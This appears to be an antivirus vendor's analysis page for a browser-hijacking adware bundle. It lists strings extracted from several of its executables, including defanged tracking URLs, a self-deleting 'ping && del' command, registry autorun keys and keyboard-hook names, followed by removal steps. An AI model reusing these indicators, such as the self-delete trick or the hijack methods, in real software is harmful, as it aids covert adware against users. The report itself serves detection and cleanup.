f:\dd\vctools\crt_bld\self_x86\crt\src\getcwd.c
f:\dd\vctools\crt_bld\self_x86\crt\prebuild\conv\x10fout.c
f:\dd\vctools\crt_bld\self_x86\crt\src\mbsnbico.c
f:\dd\vctools\crt_bld\self_x86\crt\src\strnicol.c
("CRT Logic error during setenv",0)
__crtsetenv
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISubject *,class ISubject *,struct std::less<class ISubject *>,class std::allocator<struct std::pair<class ISubject * const,class ISubject *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISubject *,class ISubject *,struct std::less<class ISubject *>,class std::allocator<struct std::pair<class ISubject * const,class ISubject *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct ChangeManager::RegistrationDetails *,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,struct ChangeManager::RegistrationDetails *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISubject *,class ISubject *,struct std::less<class ISubject *>,class std::allocator<struct std::pair<class ISubject * const,class ISubject *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct ChangeManager::RegistrationDetails *,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,struct ChangeManager::RegistrationDetails *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct ChangeManager::RegistrationDetails *,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,struct ChangeManager::RegistrationDetails *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISubject *,class ISubject *,struct std::less<class ISubject *>,class std::allocator<struct std::pair<class ISubject * const,class ISubject *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct ChangeManager::RegistrationDetails *,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,struct ChangeManager::RegistrationDetails *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<struct HKEY__ *,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<struct HKEY__ *>,class std::allocator<struct std::pair<struct HKEY__ * const,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<struct HKEY__ *,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<struct HKEY__ *>,class std::allocator<struct std::pair<struct HKEY__ * const,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<struct HKEY__ *,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<struct HKEY__ *>,class std::allocator<struct std::pair<struct HKEY__ * const,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<struct HKEY__ *,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<struct HKEY__ *>,class std::allocator<struct std::pair<struct HKEY__ * const,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator --
\\.\jsdrv1,42,0,1766
stproxy.cpp
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xstring
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\list
std::_List_const_iterator<class std::_List_val<struct json::Object::Member,class std::allocator<struct json::Object::Member> > >::operator ==
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\vector
std::_Vector_const_iterator<class std::_Vector_val<struct json::Reader::Token,class std::allocator<struct json::Reader::Token> > >::operator *
std::_Vector_const_iterator<class std::_Vector_val<struct json::Reader::Token,class std::allocator<struct json::Reader::Token> > >::operator   
std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator *
std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator   
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xtree
std::_List_const_iterator<class std::_List_val<struct json::Object::Member,class std::allocator<struct json::Object::Member> > >::operator --
std::_Deque_const_iterator<class json::UnknownElement,class std::allocator<class json::UnknownElement> >::operator *
std::_Vector_const_iterator<class std::_Vector_val<struct json::Reader::Token,class std::allocator<struct json::Reader::Token> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tset_traits<char,struct std::less<char>,class std::allocator<char>,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISockEmulator *,class EmuSession *,struct std::less<class ISockEmulator *>,class std::allocator<struct std::pair<class ISockEmulator * const,class EmuSession *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned __int64,class EmuSession *,struct std::less<unsigned __int64>,class std::allocator<struct std::pair<unsigned __int64 const ,class EmuSession *> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<struct json::Object::Member,class std::allocator<struct json::Object::Member> > >::operator *
std::_List_const_iterator<class std::_List_val<struct json::Object::Member,class std::allocator<struct json::Object::Member> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISockEmulator *,class EmuSession *,struct std::less<class ISockEmulator *>,class std::allocator<struct std::pair<class ISockEmulator * const,class EmuSession *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned __int64,class EmuSession *,struct std::less<unsigned __int64>,class std::allocator<struct std::pair<unsigned __int64 const ,class EmuSession *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned __int64,class EmuSession *,struct std::less<unsigned __int64>,class std::allocator<struct std::pair<unsigned __int64 const ,class EmuSession *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISockEmulator *,class EmuSession *,struct std::less<class ISockEmulator *>,class std::allocator<struct std::pair<class ISockEmulator * const,class EmuSession *> >,0> > >::operator   
std::_String_const_iterator<wchar_t,struct std::char_traits<wchar_t>,class std::allocator<wchar_t> >::operator *
std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator  =
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tset_traits<char,struct std::less<char>,class std::allocator<char>,0> > >::operator   
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\algorithm
invalid operator<
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tset_traits<char,struct std::less<char>,class std::allocator<char>,0> > >::operator --
gstd::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISockEmulator *,class EmuSession *,struct std::less<class ISockEmulator *>,class std::allocator<struct std::pair<class ISockEmulator * const,class EmuSession *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned __int64,class EmuSession *,struct std::less<unsigned __int64>,class std::allocator<struct std::pair<unsigned __int64 const ,class EmuSession *> >,0> > >::operator --
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\memory
std::_Deque_const_iterator<class json::UnknownElement,class std::allocator<class json::UnknownElement> >::operator   
1,42,0,1766

ProtectWindowsManager.exe_5076:




.text
`.rdata
@.data
.rsrc
@.reloc
j.Yf;
_tcPVj@
.PjRW
SHELL32.dll
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GetProcessWindowStation
operator
MaxPolicyElementKey
pExecutionResource
SHLWAPI.dll
USERENV.dll
%dYeArdMoNthdDaY
file_url
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0 %s
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
ShellExecuteExW
SHDeleteKeyW
GetWindowsDirectoryA
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
ReportEventW
RegOpenKeyW
ADVAPI32.dll
PSAPI.DLL
InternetCrackUrlW
WININET.dll
WS2_32.dll
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpWriteData
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpAddRequestHeaders
WINHTTP.dll
SensApi.dll
VERSION.dll
GetCPInfo
.?AVunsupported_os@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AUIExecutionContext@Concurrency@@
zcÁ
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
6!676$717
,050'101
7"7&7*7.72767:7
1!1%1)1-11151
00S0d0
5 5$5(5,505
? ?<?@?`?
3 3@3`3|3
combase.dll
kernel32.dll
mscoree.dll
- CRT not initialized
- Attempt to initialize the CRT more than once.
- floating point support not loaded
USER32.DLL
portuguese-brazilian
advapi32.dll
WindowsMangerProtect
SOFTWARE\supWindowsMangerProtect
xa.geoip
visit.heartbeat
hXXp://xa.xingcloud.com/v4/sof-windowspm/%s?action0=%s&action1=visit&action2=%s&update0=ref,%s&update1=nation,%s&update2=language,%s
hXXp://xa.xingcloud.com/v4/sof-windowspm/%s?action=%s
hXXp://xa.xingcloud.com/v4/sof-windowspm/%s?action=visit.heartbeat.%s
hXXp://xa.xingcloud.com/v4/sof-windowspm/%s?action=visit.heartbeat.%s&update3=version,%s
Report Start.
C:\DoStartTEST.DAT
Report Heart beat.
ProtectWindowsManager.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
TypesSupported
%s is already installed
%s installed
%s failed to install. Error %d
%s is not installed
Could not remove %s. Error %d
WindowsProtectManger
Advapi32.dll
/c ping 127.0.0.1 -n 2 > nul && del
"%s" %s
psapi.dll
Explorer.exe
update.exe
%s_%s
\\.\Phys
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
..\Src\json\src\json_value.cpp
..\Src\json\src\json_reader.cpp
xxxx
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
..\Src\json\src\json_writer.cpp
Assertion failed: %s, file %s, line %d
WindowsMangerProtect Service
C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe
WindowsMangerProtect service
SysTool PasSame LIMITED
Windows SysTool Service
20.0.0.1953
Windows SysTool.exe

ProtectService.exe_4436:




.text
`.rdata
@.data
.rsrc
@.reloc
GET %s%s%s HTTP/1.1
Host: %s
%sUser-Agent: Mozilla/4.0
POST %s HTTP/1.1
%sContent-Type: %s
User-Agent: Mozilla/4.0
Content-Length: %u
%*s %d %*s
%*[ ]%[^
?456789:;<=
!"#$%&'()* ,-./0123
file_url
E:\supsoft\SupSearchProtectV4\SearchProtect\Bin\Release\ProtectService.pdb
GetProcessHeap
GetSystemWindowsDirectoryW
KERNEL32.dll
USER32.dll
RegOpenKeyW
RegCloseKey
RegOpenKeyExW
RegCreateKeyExW
ADVAPI32.dll
SHELL32.dll
MSVCP110.dll
InternetCrackUrlW
WININET.dll
WS2_32.dll
SHLWAPI.dll
MSVCR110.dll
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
_calloc_crt
__crtGetShowWindowMode
_amsg_exit
_wcmdln
__crtSetUnhandledExceptionFilter
WinHttpCloseHandle
WinHttpOpen
WinHttpSetTimeouts
WinHttpCrackUrl
WinHttpConnect
WinHttpOpenRequest
WinHttpSetOption
WinHttpAddRequestHeaders
WinHttpSendRequest
WinHttpGetIEProxyConfigForCurrentUser
WinHttpGetProxyForUrl
WinHttpWriteData
WinHttpReceiveResponse
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpReadData
WINHTTP.dll
SensApi.dll
VERSION.dll
PSAPI.DLL
USERENV.dll
.?AVCHttpClient@@
.?AVCTcpipSocket@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
2-2v2
hXXp://
Software\Microsoft\Windows\CurrentVersion\Internet Settings
http=
WinHttpClient
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
hXXp://xa.xingcloud.com
xxxx
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
UpDateProcess.exe
hXXp://VVV.theviilage.com/searchprotect/up?ptid=%s&sid=%s&ln=%s_%s&ver=%s&uid=%s&dp=%s
g{2EFFE99D-743D-44D0-BBF2-F9DDDEA2F92D}
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Report HeartBeat
cmdshell.exe
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=visit.heartbeat.%s&update0=ref,%s&update1=nation,%s&update2=language,%s&update3=version,%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action0=xa.geoip&action1=visit&action2=install
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=uninstall
explorer.exe
Advapi32.dll
"%s" %s
psapi.dll
Explorer.exe
json_value.cpp
ljson_reader.cpp
ProtectSvc.exe
4.0.1.2105

HPNotify.exe_4640:




.text
`.rdata
@.data
.rsrc
@.reloc
<9%uo
wszUrl
strUrlTemp
hKEY
strSelUrl
strUrl
strConfUrlTemp
strDsUrl
strHpUrl
strCmdLine
tCPW
%UUUU
Vot.VotF%qt
e_GetBrowserCurrentHpUrl
e_GetBrowserCurrentDsUrl
URLDownloadToFileW
URLDownloadToFileW ret:0XX
Error : %d
inflate 1.1.3 Copyright 1995-1998 Mark Adler
1.1.3
monochrome
unsupported bit depth
`'\%D,3
Run-Time Check Failure #%d - %s
%s%s%p%s%ld%s%d%s
%s%s%s%s
RegOpenKeyExW
RegCloseKey
del /s/q %1\*.*
%suninstall.bat
E:\supsoft\SupSearchProtectV4\SearchProtect\bin\Release\HPNotify.pdb
KERNEL32.dll
GetKeyState
USER32.dll
GDI32.dll
ADVAPI32.dll
ShellExecuteW
ShellExecuteA
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHDeleteKeyW
SHLWAPI.dll
MSVCP110.dll
MSVCR110.dll
_calloc_crt
_CRT_RTC_INITW
__crtGetShowWindowMode
_amsg_exit
_wcmdln
_crt_debugger_hook
__crtUnhandledException
__crtTerminateProcess
__crtSetUnhandledExceptionFilter
GdiplusShutdown
gdiplus.dll
IMM32.dll
DeleteUrlCacheEntryW
WININET.dll
COMCTL32.dll
GetProcessHeap
#*1892 $
%,3:;4-&
.?AVCActiveXEnum@DuiLib@@
.?AVCWebBrowserUI@DuiLib@@
<requestedExecutionLevel level='requireAdministrator' uiAccess='false' />
<assemblyIdentity type='win32' name='Microsoft.Windows.Common-Controls' version='6.0.0.0' processorArchitecture='x86' publicKeyToken='6595b64144ccf1df' language='*' />
3?3
1-2}2
77t7
9":,:6:@:
12u2
: :$:(:,:0:
4 4$4(4,404
>$?(?,?0?
2 2$2(2,20242
0 1@1\1|1
hXXp://VVV.bing.com/
hXXp://VVV.yahoo.com/
hXXp://VVV.google.com/
%sconf
web/?type=dspp&
web/?type=dspp
hXXp://VVV.v9.com/
Itemd
BrowserAction.dll
%u_%u
%s_%s
%s_X
\\.\PhysicalDrive%d
\\.\Scsi%d:
UrlEdit
conf.xml
hXXp://v9.com/license_agreement.html
hXXp://v9.com/privacy_policy.html
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.show.%s
hXXp://xa.xingcloud.com/v4/searchprotect/%s?action=set.other.%s
%stmp%d.tmp
urlmon.dll
main.xml
explorer.exe
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
msimg32.dll
User32.dll
WM_KEYDOWN
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYUP
0xX
keyboard
msftedit.dll
password
%s%s%s
Correct password required
%s\%s
WebBrowser
transshadow
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
WebBrowserUI
errorUrl
{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
MSPDB110.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
%Program Files% (x86)\XTab\skin\
SupHPNot.exe
4,0,1,1716
SupHPNty.exe

WebPlayer.exe_3488:




.text
`.rdata
@.data
.rsrc
@.reloc
8%u:j
RegOpenKeyTransactedW
RegCreateKeyTransactedW
RegDeleteKeyTransactedW
operator
GetProcessWindowStation
KERNEL32.dll
EnumWindows
USER32.dll
GDI32.dll
RegOpenKeyExW
RegCreateKeyExW
RegDeleteKeyW
RegCloseKey
RegEnumKeyExW
RegQueryInfoKeyW
ADVAPI32.dll
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
COMCTL32.dll
urlmon.dll
GetProcessHeap
GetCPInfo
.?AVIKeyValueStorage@@
.?AVCWebPlayerEventsCallback@@
.?AVCComWebPlayer@@
.?AV?$CComCoClass@VCComWebPlayer@@$1?GUID_NULL@@3U_GUID@@B@ATL@@
.?AV?$IDispatchDynamicImpl@VCComWebPlayer@@@@
.?AV?$CComObject@VCComWebPlayer@@@ATL@@
.?AVCWebPlayerView@@
.?AV?$CWindowImpl@VCWebPlayerView@@V?$CAxWindowT@VCWindow@ATL@@@ATL@@V?$CWinTraits@$0FGAAAAAA@$0A@@3@@ATL@@
.?AV?$CTrayIcon@VCWebPlayerView@@@@
.?AV?$IDispEventImpl@$00VCWebPlayerView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B$1?LIBID_SHDocVw@@3U3@B$00$0A@VCComTypeInfoHolder@ATL@@@ATL@@
.?AV?$IDispEventSimpleImpl@$00VCWebPlayerView@@$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
.?AV?$_IDispEventLocator@$00$1?DIID_DWebBrowserEvents2@@3U_GUID@@B@ATL@@
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>
2 3$3(3,3
getWebBrowser
hXXps://
hXXp://
Advapi32.dll
Software\WebPlayer\
javascript.debug
javascript.show_errors
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
icons\main.ico
WebPlayerEngine
WebPlayer\
scripts\config.xml
window.placement
icons\tray.ico
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
mscoree.dll
KERNEL32.DLL
WUSER32.DLL
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\AppsHat\WebPlayer.exe
&About WebPlayer
WebPlayer
Replace%Select the entire document
Arrange Icons/Arrange windows so they overlap
Cascade Windows5Arrange windows as non-overlapping tiles
Tile Windows5Arrange windows as non-overlapping tiles
Tile Windows(Split the active window into panes
1.1.0.0
WebPlayer.exe






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    ProtectService.exe:4372
    ProtectService.exe:4436
    YTAHelper.exe:3196
    install20087.exe:1292
    ShopperPro.exe:3536
    ProtectWindowsManager.exe:5076
    ProtectWindowsManager.exe:5024
    YouTubeAcceleratorService.exe:3544
    YouTubeAcceleratorService.exe:3700
    YouTubeAcceleratorService.exe:3308
    bi.exe:2320
    Hbiagmhjfvp.exe:3504
    jsdrv.exe:3700
    wpm_v20.0.0.1953_0302.exe:5000
    cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe:4516
    45B6.tmp:3512
    ins_yta.exe:3216
    QQBrowser.exe:4888
    QQBrowser.exe:3168
    testlsp.exe:4312
    01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe:4404
    powershell.exe:3812
    powershell.exe:2532
    powershell.exe:3740
    setup.exe:1832
    HPNotify.exe:4640
    GLJ625B.tmp:3268
    Bxaze.exe:1776
    smt_istartsurf.exe:3284
    cmdshell.exe:1988
    Mniitruxnlcp.exe:3244
    XTab_Setup2121.exe:1496
    7za.exe:800
    %original file name%.exe:2684
    appshat.exe:3704
    ins_shopperpro.exe:3608
    GLB61FD.tmp:3224
    regsvr32.exe:3240
    regsvr32.exe:3888
    regsvr32.exe:1808
    regsvr32.exe:3320
    regsvr32.exe:3964
    regsvr32.exe:3060
    lspinst.exe:3356
    lspinst.exe:4156
    webplayer_installer.exe:2708
    YTAHEL~1.EXE:1600
    appshat_generic.exe:3896
    DCytaiesmt_smtyc_setup.exe:1064
    DCytaiesmt_smtyc_setup.exe:3856
    DCytaiesmt_smtyc_setup.exe:392
    DCytaiesmt_smtyc_setup.exe:3172
    DCytaiesmt_smtyc_setup.exe:2512
    DCytaiesmt_smtyc_setup.exe:3640
    cscript.exe:1372
    spbiu.exe:3496
    spbiu.exe:960
    wscript.exe:4912
    INS_SENSE.EXE:3844
    19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe:4452
    taskeng.exe:3412
    ytaiesmt_smtyc_setup.exe:2128
    cbead634babe14801c0b14d3517a10f8.tmp:2428
    INS_IWEBAR.EXE:3836
    

    2. 

  2. Delete the original Malware file.
    3. 

  3. Delete or disinfect the following files created/modified by the Malware:
    

    C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\config.json (269 bytes)
    C:\ProgramData\YTAHelper\config.json (269 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\overlay.js (13 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\overlay.xul (203 bytes)
    C:\ProgramData\YTAHelper\yta_database1_0_0.json (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (514 bytes)
    %Program Files% (x86)\YTAHelper\config.json (269 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\install.rdf (884 bytes)
    C:\ProgramData\YTAHelper\YTAHelper.dll (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\yta_database1_0_0.json (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\chrome.manifest (111 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\shopperpro_128.png (5 bytes)
    C:\ProgramData\YTAHelper\YTAHelper64.dll (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\YTAHelper_64.png (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\ajax-bidl[1].htm (803 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\4a9fc2e26d3c3249b974ded373db7ae1[1].htm (27605 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.1 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.0 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.3 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.2 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.5 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.4 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.7 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.6 (6872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe (71289 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp (33717 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.2 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.3 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.0 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.1 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.6 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.7 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.4 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.5 (10864 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.5 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.4 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.7 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.6 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.1 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.0 (4152 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.3 (4152 bytes)
